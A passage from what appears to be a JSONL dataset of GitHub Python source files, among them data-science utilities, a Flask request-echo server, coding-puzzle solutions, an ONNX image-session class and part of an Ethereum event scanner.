return df\n\n\ndef filter_maximize_expectation(df):\n df[\"is_none\"] = (df[\"product_id\"] == 'None').astype(int)\n df = df.sort_values([\"is_none\", \"pred\"], ascending=False).drop(\"is_none\", axis=1)\n df = df. \\\n groupby(\"user_id\"). \\\n apply(groupby_maximize_expectation).reset_index(drop=True)\n return df\n\n\ndef groupby_maximize_expectation(group):\n group_none = group.iloc[0:1]\n none_gain = group_none[\"pred\"].values[0]\n group_no_none = group.iloc[1:]\n pred = group_no_none[\"pred\"].values\n # Avoid weird llvm bug with numba\n if pred.shape[0] == 1:\n pred = np.append(pred, 0)\n\n best_k, predNone, max_f1 = F1Optimizer.maximize_expectation(pred, none_gain)\n\n res = group_no_none.iloc[:best_k]\n if predNone:\n res = pd.concat([res, group_none])\n\n return res\n\n\ndef compute_fscore(df, df_pred):\n df_none_true = df. \\\n groupby([\"order_id\", \"user_id\"])[\"reordered\"].sum().\\\n reset_index()\n\n # Warning bellow but don't know where :/\n # If atleast one reorderd then None is 0, otherwise 1\n df_none_true[\"reordered\"] = (df_none_true[\"reordered\"] < 1).astype(int)\n df_none_true.loc[:,\"product_id\"] = \"None\"\n df = pd.concat([df, df_none_true])\n df_y_true = df.query(\"reordered==1\").groupby(\"user_id\")[\"product_id\"].unique().reset_index()\n df_y_true.columns = [\"user_id\", \"y_true\"]\n df_y_pred = df_pred.groupby(\"user_id\")[\"product_id\"].unique().reset_index()\n df_y_pred.columns = [\"user_id\", \"y_pred\"]\n\n res = pd.merge(df_y_true, df_y_pred, on=\"user_id\", how=\"left\")\n cond = res[\"y_pred\"].isnull()\n res.loc[cond, \"y_pred\"] = np.array(['None'])\n\n res = res.apply(lambda x: multilabel_fscore(x[\"y_true\"], x[\"y_pred\"]), axis=1)\n return res.mean()\n\n\n","repo_name":"jacquespeeters/instacart-market-basket-analysis","sub_path":"utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":31617,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"72"} +{"seq_id":"23683326812","text":"import platform\nfrom flask import Flask, json, request\n\napp = Flask(__name__)\nALL_METHODS = \"GET POST PUT DELETE HEAD PATCH\".split(' ')\n\n\n@app.route('/', defaults={'path': ''}, methods=ALL_METHODS)\n@app.route('/', methods=ALL_METHODS)\ndef catch_all(path):\n return json.jsonify(dict(request=dict(path=path,\n headers=dict(request.headers),\n method=request.method,\n form=request.form,\n url=request.url),\n server=dict(hostname=platform.node(),\n remote=request.remote_addr,\n )))\n\nif __name__ == '__main__':\n app.run(host='0.0.0.0', port=5000)\n","repo_name":"factorysh/docker-http-mirror","sub_path":"mirror.py","file_name":"mirror.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"28482206014","text":"# https://leetcode.com/problems/furthest-building-you-can-reach/\n\nclass Solution:\n def furthestBuilding(self, heights: List[int], bricks: int, ladders: int) -> int:\n heap = []\n\n for i in range(len(heights) - 1):\n if bricks < 0:\n return i - 1\n\n if heights[i] >= heights[i+1]:\n continue\n\n climb = heights[i+1] - heights[i]\n if len(heap) < ladders:\n heappush(heap, climb)\n\n elif ladders == 0 or climb <= heap[0]:\n bricks -= climb\n\n elif climb > heap[0]:\n bricks -= heappop(heap)\n heappush(heap, climb)\n\n return i if bricks < 0 else i + 1\n","repo_name":"nawrazi/competitive-programming","sub_path":"week_14/furthest-building-you-can-reach.py","file_name":"furthest-building-you-can-reach.py","file_ext":"py","file_size_in_byte":715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5793756191","text":"import numpy as np\nimport matplotlib.pyplot as plt\nimport scipy, h5py\nimport helper as help\n\n\n\n\ndef load_dataset():\n with h5py.File('E:\\pycharmprojects\\CNN\\week2-programming-project\\datasets/train_catvnoncat.h5',\n \"r\") as train_dataset:\n train_set_x_orig = np.array(train_dataset[\"train_set_x\"][:])\n train_set_y_orig = np.array(train_dataset[\"train_set_y\"][:])\n\n with h5py.File('E:\\pycharmprojects\\CNN\\week2-programming-project\\datasets/test_catvnoncat.h5', \"r\") as test_dataset:\n test_set_x_orig = np.array(test_dataset[\"test_set_x\"][:])\n test_set_y_orig = np.array(test_dataset[\"test_set_y\"][:])\n classes = np.array(test_dataset[\"list_classes\"][:])\n\n train_set_y_orig = train_set_y_orig.reshape((1, train_set_y_orig.shape[0]))\n test_set_y_orig = test_set_y_orig.reshape((1, test_set_y_orig.shape[0]))\n\n return train_set_x_orig, train_set_y_orig, test_set_x_orig, test_set_y_orig, classes\n\n\n\ntrain_set_x_orig, train_set_y, test_set_x_orig, test_set_y, classes = load_dataset()\n\nprint(classes[0].decode(\"utf-8\"))\nprint(classes[1].decode(\"utf-8\"))\nindex = 25\n\nplt.subplot(141)\nplt.imshow(train_set_x_orig[index])\n\nprint(\"y = \" + str(train_set_y[:, index]) + \", it's a '\" + classes[np.squeeze(train_set_y[:, index])].decode(\n \"utf-8\") + \"' picture.\")\n\nprint(train_set_x_orig.shape)\n\n# splitting the multicolor image at index into r g and b streams\n\ntest_r = train_set_x_orig[index].copy()\ntest_g = train_set_x_orig[index].copy()\ntest_b = train_set_x_orig[index].copy()\n\n# idea behind this slicing : completely removing the r and b component from an image will give me the green component only\ntest_r[:, :, 1] = 0\ntest_r[:, :, 2] = 0\ntest_g[:, :, 0] = 0\ntest_g[:, :, 2] = 0\ntest_b[:, :, 0] = 0\ntest_b[:, :, 1] = 0\n\n# playing around with image coloring\n# test_random=train_set_x_orig[index].copy()\n# test_random[:,:,0]=(test_random[:,:,0]+255*np.random.rand())%255\n# test_random[:,:,1]=(test_random[:,:,1]+255*np.random.rand())%255\n# test_random[:,:,2]=(test_random[:,:,2]+255*np.random.rand())%255\n\nplt.subplot(142)\nplt.imshow(test_r)\nplt.subplot(143)\nplt.imshow(test_g)\nplt.subplot(144)\nplt.imshow(test_b)\nplt.show()\n\nm_train = train_set_x_orig.shape[0]\nm_test = test_set_y.shape[1]\nimg_height = train_set_x_orig.shape[1]\nimg_width = train_set_x_orig.shape[2]\nprint(f\"{m_train} {m_test} {img_height} {img_width}\")\n\n# flattening the vector\n# x=(test_r+test_g+test_b).reshape(3*img_height*img_width,1)\n# print(x)\nflatten_train = train_set_x_orig.reshape(train_set_x_orig.shape[0], -1).T\nflatten_test = test_set_x_orig.reshape(test_set_x_orig.shape[0], -1).T\n\nprint(test_set_y.shape)\nprint(train_set_y.shape)\nprint(flatten_train.shape)\nprint(flatten_test.shape)\n\n# standardizing the data as a part of preprocessing (improves the quality of data)\ntrain_set_x = flatten_train / 255\ntest_set_x = flatten_test / 255\n\n# preprocessing complete\n\n# implementing the neural network for image classification\n\nhelp.model(train_set_x_orig,train_set_y,train_set_x_orig,test_set_y)\n","repo_name":"anushka567/CNN","sub_path":"catOrNotCat/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":3035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20750067326","text":"from collections import deque\nn = int(input())\ngraph = []\nfor _ in range(n):\n graph.append(list(map(int, input().split())))\n\ndx = [0, -1, 1, 0]\ndy = [-1, 0, 0, 1]\n\nsize, count, ans = 2, 0, 0\ndef bfs(x, y):\n short = []\n flag = True\n min_dist = 100000000000\n global size, count, ans\n visited = [[0] * n for _ in range(n)]\n queue = deque()\n queue.append((x, y))\n while(queue):\n x, y = queue.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx < n and 0 <= ny < n:\n #최단거리 먹을 수 있는 물고기 칸 -> 같은 거리에 있으면 왼쪽\n if 0 < graph[nx][ny] < size and visited[nx][ny] == 0:\n visited[nx][ny] = visited[x][y] + 1\n if min_dist >= visited[nx][ny]:\n min_dist = visited[nx][ny]\n short.append([nx, ny])\n flag = False\n #비어있는 칸(0)이거나 size 같은 물고기 칸 + 다른 칸에서 물고기를 먹었다면 flag=False가 되어 더이상 queue에 추가 x\n elif (graph[nx][ny] == 0 or graph[nx][ny] == size) and visited[nx][ny] == 0 and flag:\n visited[nx][ny] = visited[x][y] + 1\n queue.append((nx, ny))\n if short:\n short.sort()\n count += 1\n if count >= size:\n size += 1\n count = 0\n ans += visited[short[0][0]][short[0][1]]\n graph[short[0][0]][short[0][1]] = 0\n return [short[0][0], short[0][1]]\n else:\n return 0\n \nfor i in range(n):\n for j in range(n):\n if graph[i][j] == 9:\n graph[i][j] = 0\n res = bfs(i, j)\n while(res):\n res = bfs(res[0], res[1])\nprint(ans)\n ","repo_name":"jongbin26/coding_test","sub_path":"python/16236.py","file_name":"16236.py","file_ext":"py","file_size_in_byte":1843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13788446861","text":"import os\nimport struct\nimport numpy as np\nimport cv2\n\n\"\"\"\nLoosely inspired by http://abel.ee.ucla.edu/cvxopt/_downloads/mnist.py\nwhich is GPL licensed.\n\"\"\"\n\ndef read(dataset = \"training\", path = \".\"):\n \"\"\"\n Python function for importing the MNIST data set. It returns an iterator\n of 2-tuples with the first element being the label and the second element\n being a numpy.uint8 2D array of pixel data for the given image.\n \"\"\"\n\n if dataset is \"training\":\n fname_img = os.path.join(path, 'train-images-idx3-ubyte')\n fname_lbl = os.path.join(path, 'train-labels-idx1-ubyte')\n elif dataset is \"testing\":\n fname_img = os.path.join(path, 't10k-images-idx3-ubyte')\n fname_lbl = os.path.join(path, 't10k-labels-idx1-ubyte')\n else:\n raise ValueError(\"dataset must be 'testing' or 'training'\")\n\n # Load everything in some numpy arrays\n with open(fname_lbl, 'rb') as flbl:\n magic, num = struct.unpack(\">II\", flbl.read(8))\n lbl = np.fromfile(flbl, dtype=np.int8)\n r_lbl = np.zeros((num, 10))\n for i in range(len(lbl)):\n r_lbl[i][lbl[i]] = 1\n\n with open(fname_img, 'rb') as fimg:\n magic, num, rows, cols = struct.unpack(\">IIII\", fimg.read(16))\n img = np.fromfile(fimg, dtype=np.uint8).reshape(len(lbl), rows, cols)\n img = np.divide(img, 255.0)\n get_img = lambda idx: (r_lbl[idx].astype(np.float64), img[idx].reshape(-1).astype(np.float64))\n # Create an iterator which returns each image in turn\n yield num\n while True:\n for i in range(len(lbl)):\n yield get_img(i)\n\ndef package_data(f,size):\n r_img = None\n r_label = None\n for i in range(size):\n if i == 0:\n r_label, r_img = next(f)\n else:\n tmp_label, tmp_img = next(f)\n r_label = np.concatenate((r_label, tmp_label))\n r_img = np.concatenate((r_img, tmp_img))\n return reshape(r_img, size), reshape(r_label, size)\n\ndef reshape(n_a, size):\n l_size = n_a.shape[0]\n row_size = l_size // size\n col_size = size\n return n_a.reshape(col_size, row_size)\n\nif __name__ == '__main__':\n f = read(path='MNIST_data')\n print(next(f))\n # label, img = next(f)\n # print(img.shape)\n # cv2.imshow('img',img)\n # cv2.waitKey(0)\n # print(\"label: {}\".format(label))\n # print(\"img : {}\".format(img))\n # print(img.shape)\n img, label = package_data(f, 500)\n index = 450\n print(img[index])\n # cv2.imshow('img', img[index].reshape(28,28))\n # cv2.waitKey(0)\n # print(img[99])\n # ascii_show(img[0])","repo_name":"neineihao/Deep_Learning","sub_path":"mnist_read.py","file_name":"mnist_read.py","file_ext":"py","file_size_in_byte":2579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"21895154600","text":"\"\"\"Panel dashboard.\"\"\"\nimport os\nfrom fkiss.termcolor import cprint\n\ntry:\n import param\n import panel as pn\nexcept ImportError as exc:\n cprint(\"Use `conda install panel` or `pip install panel` to install the python package.\", \"red\")\n raise exc\n\ndef _df(df):\n return pn.widgets.DataFrame(df, disabled=True)\n\n\n# Possible approach to display big SVG files: https://github.com/ariutta/svg-pan-zoom\n#\n\n\nclass ProjectViewer(param.Parameterized):\n \"\"\"\n A Dashboard to browse the source code, visualize connections among directories,\n files and procedures inside the Abinit project.\n Panel can can be executed either inside a jupyter notebook or as a standalone bokeh app.\n \"\"\"\n\n engine = pn.widgets.Select(value=\"dot\",\n options=['dot', 'neato', 'twopi', 'circo', 'fdp', 'sfdp', 'patchwork', 'osage'])\n\n def __init__(self, proj, **params):\n super().__init__(**params)\n self.proj = proj\n self._layout()\n\n def _layout(self):\n self.dir2files = self.proj.groupby_dirname()\n self.dirname2path = {os.path.basename(p): p for p in self.dir2files}\n self.dir_select = pn.widgets.Select(name=\"Directory\", options=list(self.dirname2path.keys()))\n self.all_pubs = self.proj.get_all_public_procedures()\n\n width = 200\n self.file_select = pn.widgets.Select(name=\"Fortran File\", width=width)\n self.pubproc_select = pn.widgets.Select(name=\"Public Procedure\", width=width)\n self.datatype_select = pn.widgets.Select(name=\"Datatype\", width=width)\n\n self.find_proc = pn.widgets.AutocompleteInput(name='Find Procedure', options=list(self.all_pubs.keys()),\n placeholder='Enter procedure name', width=width)\n self.find_proc_btn = pn.widgets.Button(name=\"Find Procedure\", button_type='primary', width=width)\n self.find_proc_btn.on_click(self.on_find_proc_btn)\n\n self.all_datatypes_and_fortfiles = self.proj.get_all_datatypes_and_fortfile()\n self.find_dtype = pn.widgets.AutocompleteInput(name='Find Datatype',\n options=list(self.all_datatypes_and_fortfiles.keys()),\n placeholder='Enter datatype name', width=width)\n self.find_dtype_btn = pn.widgets.Button(name=\"Find DataType\", button_type='primary', width=width)\n self.find_dtype_btn.on_click(self.on_find_dtype_btn)\n\n self.tabs = pn.Tabs(\n (\"Directory\", self.view_dirname),\n (\"File\", self.view_fort_file),\n (\"Procedure\", self.view_pubproc),\n (\"Datatype\", self.view_datatype),\n )\n\n controllers = pn.Row(\n pn.Column(self.dir_select, self.file_select),\n pn.Column(self.pubproc_select, self.datatype_select),\n pn.Column(self.find_proc, self.find_proc_btn),\n pn.Column(self.find_dtype, self.find_dtype_btn),\n #pn.Column(self.engine),\n #, self.rerun_btn),\n #sizing_mode='scale_width'\n )\n\n self.panel = pn.Column(controllers, self.tabs, sizing_mode=\"scale_width\")\n\n def _find_fort_file(self, dirpath):\n for fort_file in self.dir2files[dirpath]:\n if fort_file.name == self.file_select.value: return fort_file\n else:\n raise ValueError(\"Cannot find fortran file with name: `%s` in `%s`\" % (\n self.file_select.value, dirpath))\n\n @param.depends('dir_select.value')\n def view_dirname(self):\n dirpath = self.dirname2path[self.dir_select.value]\n # Update widgets.\n self.file_select.options = [f.name for f in self.dir2files[dirpath]]\n if hasattr(self, \"tabs\"): self.tabs.active = 0\n\n return pn.Row(_df(self.proj.get_stats_dir(dirpath)),\n self.proj.get_graphviz_dir(dirpath, engine=self.engine.value),\n sizing_mode=\"scale_width\")\n\n @param.depends('file_select.value')\n def view_fort_file(self):\n dirpath = self.dirname2path[self.dir_select.value]\n fort_file = self._find_fort_file(dirpath)\n\n # Update widgets.\n self.pubproc_select.options = list(fort_file.all_public_procedures.keys())\n self.datatype_select.options = list(fort_file.all_datatypes.keys())\n if hasattr(self, \"tabs\"): self.tabs.active = 1\n\n return pn.Row(_df(fort_file.get_stats()),\n fort_file.get_graphviz(engine=self.engine.value),\n sizing_mode=\"scale_width\")\n\n @param.depends('pubproc_select.value')\n def view_pubproc(self):\n pubname = self.pubproc_select.value\n if pubname is None: return\n obj = self.proj.find_public_entity(pubname)\n graph = self.proj.get_graphviz_pubname(pubname, engine=self.engine.value)\n if hasattr(self, \"tabs\"): self.tabs.active = 2\n return pn.Row(obj, graph, sizing_mode=\"scale_width\")\n\n @param.depends('datatype_select.value')\n def view_datatype(self):\n typename = self.datatype_select.value\n if typename is None: return\n dirpath = self.dirname2path[self.dir_select.value]\n fort_file = self._find_fort_file(dirpath)\n #print(\"fort_file.path\", fort_file.path)\n dtype = fort_file.all_datatypes[typename]\n if hasattr(self, \"tabs\"): self.tabs.active = 3\n return pn.Row(dtype)\n\n def on_find_proc_btn(self, event):\n pubname = self.find_proc.value\n if pubname is None: return # or pubname not in self.all_pubs: return\n proc = self.all_pubs[pubname]\n dirpath = proc.dirpath\n file_basename = os.path.basename(proc.path)\n fort_file = self.proj.fort_files[file_basename]\n\n # Update widgets.\n self.dir_select.value = os.path.basename(dirpath)\n self.file_select.options = [f.name for f in self.dir2files[dirpath]]\n self.pubproc_select.options = list(fort_file.all_public_procedures.keys())\n self.datatype_select.options = list(fort_file.all_datatypes.keys())\n\n self.pubproc_select.value = pubname\n if hasattr(self, \"tabs\"): self.tabs.active = 2\n\n def on_find_dtype_btn(self, event):\n dname = self.find_dtype.value\n dtype, fort_file = self.all_datatypes_and_fortfiles[dname]\n\n # Update widgets.\n self.dir_select.value = os.path.basename(fort_file.dirname)\n self.file_select.value = fort_file.basename\n self.datatype_select.value = dname\n if hasattr(self, \"tabs\"): self.tabs.active = 3\n","repo_name":"abinit/abinit","sub_path":"fkiss/viewer.py","file_name":"viewer.py","file_ext":"py","file_size_in_byte":6788,"program_lang":"python","lang":"en","doc_type":"code","stars":193,"dataset":"github-code","pt":"72"} +{"seq_id":"35852833096","text":"import os\nfrom typing import Dict, List, Tuple\n\nimport numpy as np\nimport onnxruntime as ort\nfrom PIL import Image\nfrom PIL.Image import Image as PILImage\n\n\nclass BaseSession:\n def __init__(\n self,\n model_name: str,\n sess_opts: ort.SessionOptions,\n providers=None,\n *args,\n **kwargs\n ):\n self.model_name = model_name\n\n self.providers = []\n\n _providers = ort.get_available_providers()\n if providers:\n for provider in providers:\n if provider in _providers:\n self.providers.append(provider)\n else:\n self.providers.extend(_providers)\n\n self.inner_session = ort.InferenceSession(\n str(self.__class__.download_models(*args, **kwargs)),\n providers=self.providers,\n sess_options=sess_opts,\n )\n\n def normalize(\n self,\n img: PILImage,\n mean: Tuple[float, float, float],\n std: Tuple[float, float, float],\n size: Tuple[int, int],\n *args,\n **kwargs\n ) -> Dict[str, np.ndarray]:\n im = img.convert(\"RGB\").resize(size, Image.LANCZOS)\n\n im_ary = np.array(im)\n im_ary = im_ary / np.max(im_ary)\n\n tmpImg = np.zeros((im_ary.shape[0], im_ary.shape[1], 3))\n tmpImg[:, :, 0] = (im_ary[:, :, 0] - mean[0]) / std[0]\n tmpImg[:, :, 1] = (im_ary[:, :, 1] - mean[1]) / std[1]\n tmpImg[:, :, 2] = (im_ary[:, :, 2] - mean[2]) / std[2]\n\n tmpImg = tmpImg.transpose((2, 0, 1))\n\n return {\n self.inner_session.get_inputs()[0]\n .name: np.expand_dims(tmpImg, 0)\n .astype(np.float32)\n }\n\n def predict(self, img: PILImage, *args, **kwargs) -> List[PILImage]:\n raise NotImplementedError\n\n @classmethod\n def checksum_disabled(cls, *args, **kwargs):\n return os.getenv(\"MODEL_CHECKSUM_DISABLED\", None) is not None\n\n @classmethod\n def u2net_home(cls, *args, **kwargs):\n return os.path.expanduser(\n os.getenv(\n \"U2NET_HOME\", os.path.join(os.getenv(\"XDG_DATA_HOME\", \"~\"), \".u2net\")\n )\n )\n\n @classmethod\n def download_models(cls, *args, **kwargs):\n raise NotImplementedError\n\n @classmethod\n def name(cls, *args, **kwargs):\n raise NotImplementedError\n","repo_name":"danielgatis/rembg","sub_path":"rembg/sessions/base.py","file_name":"base.py","file_ext":"py","file_size_in_byte":2351,"program_lang":"python","lang":"en","doc_type":"code","stars":12170,"dataset":"github-code","pt":"72"} +{"seq_id":"33783927020","text":"# Code is modified from version provided at https://web3py.readthedocs.io/en/latest/examples.html#example-code\n\n\"\"\"A stateful event scanner for Ethereum-based blockchains using Web3.py.\n\nWith the stateful mechanism, you can do one batch scan or incremental scans,\nwhere events are added wherever the scanner left off.\n\"\"\"\n\nimport os\nimport sched\nfrom eth_typing import BlockNumber\nfrom web3.providers.rpc import HTTPProvider\nimport json\nimport datetime\nimport time\nimport logging\nfrom abc import ABC, abstractmethod\nfrom typing import Tuple, Optional, Callable, List, Iterable\nfrom sqlitedict import SqliteDict\n\nfrom web3 import Web3\nfrom web3.contract import Contract\nfrom web3.datastructures import AttributeDict\nfrom web3.exceptions import BlockNotFound\nfrom eth_abi.codec import ABICodec\n\n# Currently this method is not exposed over official web3 API,\n# but we need it to construct eth_getLogs parameters\nfrom web3._utils.filters import construct_event_filter_params\nfrom web3._utils.events import get_event_data\nfrom dotenv import load_dotenv, find_dotenv\n\nfrom discord_webhook import DiscordWebhook\n\nload_dotenv(find_dotenv())\n\nlogger = logging.getLogger(__name__)\nFIRST_BLOCK_TO_SCAN = 21800000\nRUN_EVERY_X_SECONDS = 4\n\nIS_DEV = \"PRODUCTION\" not in os.environ or os.environ[\"PRODUCTION\"] != \"true\"\n\nSCRIPT_DIR = os.path.dirname(__file__) # <-- absolute dir the script is in\nDEPLOYMENT_REL_PATH = (\n \"../../../ui/deployment.json\" if IS_DEV else \"../../../ui/deployment-prod.json\"\n)\nPAWN_SHOP_REL_PATH = (\n \"../../../build/contracts/PawnShop.json\"\n if IS_DEV\n else \"../../../prod-deployment/contracts/PawnShop.json\"\n)\n\nDISCORD_WEBHOOK_URL = os.environ.get(\"DISCORD_WEBHOOK_URL\")\n\nADDRESSES = json.load(open(os.path.join(SCRIPT_DIR, DEPLOYMENT_REL_PATH)))\n\nCONTRACT_ADDRESS = ADDRESSES[\"PawnShop\"]\nCONTRACT_FILE = json.load(\n open(os.path.join(SCRIPT_DIR, PAWN_SHOP_REL_PATH), \"r\"))\nCONTRACT_ABI = CONTRACT_FILE[\"abi\"]\nFIRST_BLOCK_TO_SCAN = ADDRESSES[\"deploymentBlock\"]\n\nDB_FOLDER_PREFIX = os.path.join(SCRIPT_DIR, \"../../db/jewel\")\n\n\nclass IEventScannerState(ABC):\n \"\"\"Application state that remembers what blocks we have scanned in the case of crash.\"\"\"\n\n @abstractmethod\n def get_last_scanned_block(self) -> int:\n \"\"\"Number of the last block we have scanned on the previous cycle.\n\n :return: 0 if no blocks scanned yet\n \"\"\"\n\n @abstractmethod\n def start_chunk(self, block_number: int):\n \"\"\"Scanner is about to ask data of multiple blocks over JSON-RPC.\n\n Start a database session if needed.\n \"\"\"\n\n @abstractmethod\n def end_chunk(self, block_number: int):\n \"\"\"Scanner finished a number of blocks.\n\n Persistent any data in your state now.\n \"\"\"\n\n @abstractmethod\n def process_event(\n self, block_when: datetime.datetime, event: AttributeDict, latest_block_number: BlockNumber\n ) -> object:\n \"\"\"Process incoming events.\n\n This function takes raw events from Web3, transforms them to your application internal\n format, then saves them in a database or some other state.\n\n :param block_when: When this block was mined\n\n :param event: Symbolic dictionary of the event data\n\n :return: Internal state structure that is the result of event tranformation.\n \"\"\"\n\n @abstractmethod\n def delete_data(self, since_block: int) -> int:\n \"\"\"Delete any data since this block was scanned.\n\n Purges any potential minor reorg data.\n \"\"\"\n\n\nclass EventScanner:\n \"\"\"Scan blockchain for events and try not to abuse JSON-RPC API too much.\n\n Can be used for real-time scans, as it detects minor chain reorganisation and rescans.\n Unlike the easy web3.contract.Contract, this scanner can scan events from multiple contracts at once.\n For example, you can get all transfers from all tokens in the same scan.\n\n You *should* disable the default `http_retry_request_middleware` on your provider for Web3,\n because it cannot correctly throttle and decrease the `eth_getLogs` block number range.\n \"\"\"\n\n def __init__(\n self,\n web3: Web3,\n contract: Contract,\n state: IEventScannerState,\n events: List,\n filters: {},\n max_chunk_scan_size: int = 10000,\n max_request_retries: int = 30,\n request_retry_seconds: float = 3.0,\n ):\n \"\"\"\n :param contract: Contract\n :param events: List of web3 Event we scan\n :param filters: Filters passed to getLogs\n :param max_chunk_scan_size: JSON-RPC API limit in the number of blocks we query. (Recommendation: 10,000 for mainnet, 500,000 for testnets)\n :param max_request_retries: How many times we try to reattempt a failed JSON-RPC call\n :param request_retry_seconds: Delay between failed requests to let JSON-RPC server to recover\n \"\"\"\n\n self.logger = logger\n self.contract = contract\n self.web3 = web3\n self.state = state\n self.events = events\n self.filters = filters\n\n # Our JSON-RPC throttling parameters\n self.min_scan_chunk_size = 10 # 12 s/block = 120 seconds period\n self.max_scan_chunk_size = max_chunk_scan_size\n self.max_request_retries = max_request_retries\n self.request_retry_seconds = request_retry_seconds\n\n # Factor how fast we increase the chunk size if results are found\n # # (slow down scan after starting to get hits)\n self.chunk_size_decrease = 0.5\n\n # Factor how was we increase chunk size if no results found\n self.chunk_size_increase = 2.0\n\n @property\n def address(self):\n return self.token_address\n\n def get_block_timestamp(self, block_num) -> datetime.datetime:\n \"\"\"Get Ethereum block timestamp\"\"\"\n try:\n block_info = self.web3.eth.getBlock(block_num)\n except BlockNotFound:\n # Block was not mined yet,\n # minor chain reorganisation?\n return None\n last_time = block_info[\"timestamp\"]\n return datetime.datetime.fromtimestamp(last_time, datetime.timezone.utc)\n\n def get_suggested_scan_start_block(self):\n \"\"\"Get where we should start to scan for new token events.\n\n If there are no prior scans, start from block 1.\n Otherwise, start from the last end block minus ten blocks.\n We rescan the last ten scanned blocks in the case there were forks to avoid\n misaccounting due to minor single block works (happens once in a hour in Ethereum).\n These heurestics could be made more robust, but this is for the sake of simple reference implementation.\n \"\"\"\n\n end_block = self.get_last_scanned_block()\n if end_block:\n return max(1, end_block - self.NUM_BLOCKS_RESCAN_FOR_FORKS)\n return 1\n\n def get_suggested_scan_end_block(self):\n \"\"\"Get the last mined block on Ethereum chain we are following.\"\"\"\n\n # Do not scan all the way to the final block, as this\n # block might not be mined yet\n return self.web3.eth.blockNumber\n\n def get_last_scanned_block(self) -> int:\n return self.state.get_last_scanned_block()\n\n def delete_potentially_forked_block_data(self, after_block: int):\n \"\"\"Purge old data in the case of blockchain reorganisation.\"\"\"\n self.state.delete_data(after_block)\n\n def scan_chunk(self, start_block, end_block) -> Tuple[int, datetime.datetime, list]:\n \"\"\"Read and process events between to block numbers.\n\n Dynamically decrease the size of the chunk if the case JSON-RPC server pukes out.\n\n :return: tuple(actual end block number, when this block was mined, processed events)\n \"\"\"\n\n block_timestamps = {}\n get_block_timestamp = self.get_block_timestamp\n\n # Cache block timestamps to reduce some RPC overhead\n # Real solution might include smarter models around block\n def get_block_when(block_num):\n if block_num not in block_timestamps:\n block_timestamps[block_num] = get_block_timestamp(block_num)\n return block_timestamps[block_num]\n\n all_processed = []\n\n for event_type in self.events:\n # Callable that takes care of the underlying web3 call\n def _fetch_events(_start_block, _end_block):\n return _fetch_events_for_all_contracts(\n self.web3,\n event_type,\n self.filters,\n from_block=_start_block,\n to_block=_end_block,\n )\n\n # Do `n` retries on `eth_getLogs`,\n # throttle down block range if needed\n end_block, events = _retry_web3_call(\n _fetch_events,\n start_block=start_block,\n end_block=end_block,\n retries=self.max_request_retries,\n delay=self.request_retry_seconds,\n )\n\n for evt in events:\n idx = evt[\n \"logIndex\"\n ] # Integer of the log index position in the block, null when its pending\n\n # We cannot avoid minor chain reorganisations, but\n # at least we must avoid blocks that are not mined yet\n assert idx is not None, \"Somehow tried to scan a pending block\"\n\n block_number = evt[\"blockNumber\"]\n\n tx = {}\n if evt[\"event\"] == \"UTXORedeemed\":\n tx = self.web3.eth.get_transaction(evt[\"transactionHash\"])\n\n # Get UTC time when this event happened (block mined timestamp)\n # from our in-memory cache\n block_when = get_block_when(block_number)\n\n logger.debug(\n \"Processing event %s, block: %d\",\n evt[\"event\"],\n evt[\"blockNumber\"],\n )\n processed = self.state.process_event(\n block_when, evt, tx=tx, latest_block_number=self.web3.eth.blockNumber)\n all_processed.append(processed)\n\n end_block_timestamp = get_block_when(end_block)\n return end_block, end_block_timestamp, all_processed\n\n def estimate_next_chunk_size(self, current_chuck_size: int, event_found_count: int):\n \"\"\"Try to figure out optimal chunk size\n\n Our scanner might need to scan the whole blockchain for all events\n\n * We want to minimize API calls over empty blocks\n\n * We want to make sure that one scan chunk does not try to process too many entries once, as we try to control commit buffer size and potentially asynchronous busy loop\n\n * Do not overload node serving JSON-RPC API by asking data for too many events at a time\n\n Currently Ethereum JSON-API does not have an API to tell when a first event occured in a blockchain\n and our heuristics try to accelerate block fetching (chunk size) until we see the first event.\n\n These heurestics exponentially increase the scan chunk size depending on if we are seeing events or not.\n When any transfers are encountered, we are back to scanning only a few blocks at a time.\n It does not make sense to do a full chain scan starting from block 1, doing one JSON-RPC call per 20 blocks.\n \"\"\"\n\n if event_found_count > 0:\n # When we encounter first events, reset the chunk size window\n current_chuck_size = self.min_scan_chunk_size\n else:\n current_chuck_size *= self.chunk_size_increase\n\n current_chuck_size = max(self.min_scan_chunk_size, current_chuck_size)\n current_chuck_size = min(self.max_scan_chunk_size, current_chuck_size)\n return int(current_chuck_size)\n\n def scan(\n self,\n start_block,\n end_block,\n start_chunk_size=20,\n progress_callback=Optional[Callable],\n ) -> Tuple[list, int]:\n \"\"\"Perform a token balances scan.\n\n Assumes all balances in the database are valid before start_block (no forks sneaked in).\n\n :param start_block: The first block included in the scan\n\n :param end_block: The last block included in the scan\n\n :param start_chunk_size: How many blocks we try to fetch over JSON-RPC on the first attempt\n\n :param progress_callback: If this is an UI application, update the progress of the scan\n\n :return: [All processed events, number of chunks used]\n \"\"\"\n\n assert start_block <= end_block\n\n current_block = start_block\n\n # Scan in chunks, commit between\n chunk_size = start_chunk_size\n last_scan_duration = last_logs_found = 0\n total_chunks_scanned = 0\n\n # All processed entries we got on this scan cycle\n all_processed = []\n\n while current_block <= end_block:\n\n self.state.start_chunk(current_block, chunk_size)\n\n # Print some diagnostics to logs to try to fiddle with real world JSON-RPC API performance\n estimated_end_block = current_block + chunk_size\n logger.debug(\n \"Scanning token transfers for blocks: %d - %d, chunk size %d, last chunk scan took %f, last logs found %d\",\n current_block,\n estimated_end_block,\n chunk_size,\n last_scan_duration,\n last_logs_found,\n )\n\n start = time.time()\n actual_end_block, end_block_timestamp, new_entries = self.scan_chunk(\n current_block, estimated_end_block\n )\n\n # Where does our current chunk scan ends - are we out of chain yet?\n current_end = actual_end_block\n\n last_scan_duration 